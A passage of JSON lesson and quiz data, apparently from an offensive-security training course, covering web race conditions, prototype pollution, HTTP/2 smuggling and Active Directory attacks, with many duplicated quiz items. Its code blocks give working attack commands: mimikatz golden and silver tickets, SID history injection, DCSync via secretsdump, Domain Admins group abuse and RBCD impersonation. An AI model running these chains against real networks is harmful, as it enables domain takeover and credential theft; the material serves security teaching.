checks for...","opts":["Expired certificates","Known vulnerable JavaScript libraries","Retired domains","Old servers"],"ans":1},{"type":"quiz","q":"Supply chain attacks are effective because...","opts":["They're simple","Targets trust their vendors and dependencies implicitly","They use encryption","They target hardware"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-race-condition-exploit","cat":"Web Application","title":"Race Condition Exploitation in Web Apps","diff":3,"xp":300,"intro":"Win the race between check and action to bypass business logic.","sections":[{"type":"text","content":"Web race conditions: send the same coupon code 100 times simultaneously \u2014 if the server checks 'is it used?' and marks it used in separate operations, multiple requests succeed. Bank transfers, vote counts, inventory deductions \u2014 all vulnerable."},{"type":"code","lang":"python","content":"import threading, requests\n\nurl = 'https://target.com/api/redeem'\ntoken = 'AUTH_TOKEN'\nheaders = {'Authorization': f'Bearer {token}'}\n\ndef redeem():\n    r = requests.post(url, json={'code': 'DISCOUNT50'}, headers=headers)\n    print(r.status_code, r.json().get('message',''))\n\n# Send 50 concurrent requests\nthreads = [threading.Thread(target=redeem) for _ in range(50)]\nfor t in threads: t.start()\nfor t in threads: t.join()\n\n# If multiple succeed, race condition confirmed"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"A race condition in a coupon system allows...","opts":["SQL injection","Redeeming the same coupon multiple times simultaneously","XSS","File upload"],"ans":1},{"type":"quiz","q":"Race conditions are caused by...","opts":["Weak encryption","Non-atomic check-then-act operations","Missing input validation","SQL errors"],"ans":1},{"type":"quiz","q":"The best defense against race conditions is...","opts":["Rate limiting","Database-level atomic operations and locking","Input validation","CAPTCHA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-prototype-pollution","cat":"Web Application","title":"Prototype Pollution in JavaScript","diff":3,"xp":300,"intro":"Modify Object.prototype to inject properties into every object in the application.","sections":[{"type":"text","content":"In JavaScript, every object inherits from Object.prototype. If an attacker can set a property on the prototype (via deep merge, lodash.merge, or query parameter parsing), that property appears on EVERY object \u2014 enabling XSS, privilege escalation, or RCE."},{"type":"code","lang":"javascript","content":"// Vulnerable deep merge function\nfunction merge(target, source) {\n  for (let key in source) {\n    if (typeof source[key] === 'object') {\n      target[key] = merge(target[key] || {}, source[key]);\n    } else {\n      target[key] = source[key];\n    }\n  }\n  return target;\n}\n\n// Attack: pollute Object.prototype\nconst payload = JSON.parse('{\"__proto__\":{\"isAdmin\":true}}');\nmerge({}, payload);\n\n// Now EVERY object has isAdmin = true\nconst user = {};\nconsole.log(user.isAdmin); // true!"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Prototype pollution affects...","opts":["Only the modified object","Every object in the application","Only arrays","Only strings"],"ans":1},{"type":"quiz","q":"__proto__ is dangerous because it...","opts":["Is encrypted","References the object's prototype chain","Is a reserved keyword","Causes memory leaks"],"ans":1},{"type":"quiz","q":"Which function is commonly vulnerable to prototype pollution?","opts":["console.log","Deep merge / lodash.merge","JSON.stringify","Array.push"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-http2-smuggling","cat":"Web Application","title":"HTTP/2 Request Smuggling","diff":3,"xp":300,"intro":"Exploit HTTP/2 downgrade to HTTP/1.1 for desync attacks.","sections":[{"type":"text","content":"When a front-end speaks HTTP/2 and a backend speaks HTTP/1.1, the translation between protocols creates desync opportunities. HTTP/2's binary framing doesn't have Content-Length ambiguity, but the downgrade reintroduces it."},{"type":"code","lang":"bash","content":"# HTTP/2-to-HTTP/1.1 smuggling via H2.CL desync\n# Front-end (HTTP/2): trusts content-length from HTTP/2 frame\n# Back-end (HTTP/1.1): uses the translated content-length\n# If the front-end doesn't validate CL matches body length:\n\n# Send oversized body in HTTP/2 frame with small CL header\n# Back-end reads CL bytes, leftover becomes next request\n\n# Testing with Burp Suite Turbo Intruder:\n# Or h2csmuggler:\npython3 h2csmuggler.py -x https://target.com/ --test"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HTTP/2 smuggling exploits...","opts":["Encryption weakness","Protocol downgrade translation differences","DNS resolution","Cookie handling"],"ans":1},{"type":"quiz","q":"H2.CL desync happens when...","opts":["Both sides use HTTP/2","Content-Length doesn't match the actual body in the downgraded request","The server crashes","TLS fails"],"ans":1},{"type":"quiz","q":"HTTP request smuggling can lead to...","opts":["DDoS only","Cache poisoning, credential theft, request hijacking","Faster page loads","Better SEO"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"network-kerberos-attacks","cat":"Network Attacks","title":"Kerberos Protocol Attacks Deep Dive","diff":3,"xp":300,"intro":"Understand the Kerberos flow to attack every step: AS-REP, TGS, delegation, PAC.","sections":[{"type":"text","content":"Kerberos has multiple attack points: AS-REP roasting (no pre-auth), Kerberoasting (crackable TGS), Silver Tickets (forged TGS), Golden Tickets (forged TGT), delegation abuse (constrained/unconstrained/RBCD), and PAC manipulation."},{"type":"code","lang":"bash","content":"# Full Kerberos attack chain:\n# 1. AS-REP Roast (find accounts without pre-auth)\nimpacket-GetNPUsers domain.local/ -dc-ip DC -no-pass -usersfile users.txt\n# 2. Kerberoast (crack service tickets)\nimpacket-GetUserSPNs domain.local/user:pass -dc-ip DC -request\nhashcat -m 13100 tgs_hashes.txt rockyou.txt\n# 3. Silver Ticket (forge TGS with service hash)\nmimikatz# kerberos::golden /service:cifs /target:fileserver /rc4:HASH /user:admin /domain:domain.local /ptt\n# 4. Golden Ticket (forge TGT with krbtgt hash)\nmimikatz# kerberos::golden /user:fakeadmin /domain:domain.local /krbtgt:HASH /ptt\n# 5. Delegation abuse\nfindDelegation.py domain.local/user:pass -dc-ip DC"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"AS-REP roasting targets accounts with...","opts":["Strong passwords","Pre-authentication disabled","Admin privileges","Expired passwords"],"ans":1},{"type":"quiz","q":"A Golden Ticket can impersonate...","opts":["Only the admin","Any user in the domain including non-existent ones","Only service accounts","Only the krbtgt account"],"ans":1},{"type":"quiz","q":"Kerberos delegation abuse allows...","opts":["Password cracking","Impersonating users to specific services","Network scanning","DDoS attacks"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"network-ad-trusts-abuse","cat":"Network Attacks","title":"Active Directory Trust Exploitation","diff":3,"xp":300,"intro":"Pivot across domain and forest trusts to compromise the entire enterprise.","sections":[{"type":"text","content":"AD trusts let users in one domain access resources in another. Bidirectional trusts, SID history injection, and cross-forest kerberoasting turn a single domain compromise into full enterprise control."},{"type":"code","lang":"bash","content":"# Enumerate trusts\nnltest /domain_trusts\nGet-DomainTrust\nGet-ForestTrust\n\n# Cross-domain Kerberoasting\nGet-DomainUser -SPN -Domain trustedforest.local\nRubeus.exe kerberoast /domain:trustedforest.local\n\n# SID History attack (inject Enterprise Admin SID)\nmimikatz# kerberos::golden /user:fakeuser /domain:child.local /sid:S-1-5-21-CHILD /krbtgt:CHILD_HASH /sids:S-1-5-21-PARENT-519 /ptt\n# 519 = Enterprise Admins SID in the parent domain\n# Now you're Enterprise Admin across the forest"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SID History injection allows...","opts":["Password reset","Privilege escalation across domain/forest trusts","Network scanning","Log deletion"],"ans":1},{"type":"quiz","q":"A bidirectional trust means...","opts":["One-way access","Both domains can authenticate users to each other","No trust","Admin-only access"],"ans":1},{"type":"quiz","q":"Why are forest trusts high-value targets?","opts":["They're encrypted","Compromising one forest can lead to the entire enterprise","They're faster","They use different protocols"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"privesc-ad-acl-abuse","cat":"Privilege Escalation","title":"Active Directory ACL Abuse","diff":3,"xp":300,"intro":"Misconfigured AD permissions let you reset passwords, add group members, or DCSync.","sections":[{"type":"text","content":"AD objects have ACLs. If you have GenericAll on a user, you can reset their password. WriteDacl on the domain? Grant yourself DCSync rights. AddMember on Domain Admins? Add yourself. BloodHound reveals these paths that manual enumeration misses."},{"type":"code","lang":"bash","content":"# Find dangerous ACLs with BloodHound\n# Pre-built query: 'Shortest Path to Domain Admin from Owned Principals'\n\n# GenericAll on a user -> reset their password\nnet user victimuser NewPassword123! /domain\n\n# WriteDacl on domain -> grant yourself DCSync\nAdd-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity myuser -Rights DCSync\nimpacket-secretsdump domain.local/myuser:pass@DC\n\n# AddMember on Domain Admins\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members myuser\n\n# ForceChangePassword\nSet-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"GenericAll on a user object allows...","opts":["Read-only access","Full control including password reset","Network scanning","Log viewing"],"ans":1},{"type":"quiz","q":"WriteDacl on the domain object allows...","opts":["Modifying DNS","Granting yourself any permission including DCSync","Reading email","Creating OUs"],"ans":1},{"type":"quiz","q":"BloodHound finds ACL abuse paths by...","opts":["Port scanning","Graphing AD relationships and permissions","Brute forcing","Packet capture"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"privesc-rbcd-abuse","cat":"Privilege Escalation","title":"Resource-Based Constrained Delegation Abuse","diff":3,"xp":300,"intro":"Create a computer account, configure RBCD, and impersonate any user.","sections":[{"type":"text","content":"If you can write to a computer object's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, you can configure it to trust a computer account you control. Then use S4U2Self + S4U2Proxy to impersonate any user to that computer's services."},{"type":"code","lang":"bash","content":"# 1. Create a new computer account (default: any user can add 10)\nimpacket-addcomputer domain.local/user:pass -computer-name 'FAKECOMP$' -computer-pass 'P@ss123'\n\n# 2. Set RBCD on the target computer (needs GenericWrite on the target)\nimpacket-rbcd domain.local/user:pass -delegate-from 'FAKECOMP$' -delegate-to 'TARGETCOMP$' -action write -dc-ip DC\n\n# 3. Get a service ticket impersonating admin to the target\nimpacket-getST domain.local/'FAKECOMP$':'P@ss123' -spn cifs/TARGETCOMP.domain.local -impersonate administrator -dc-ip 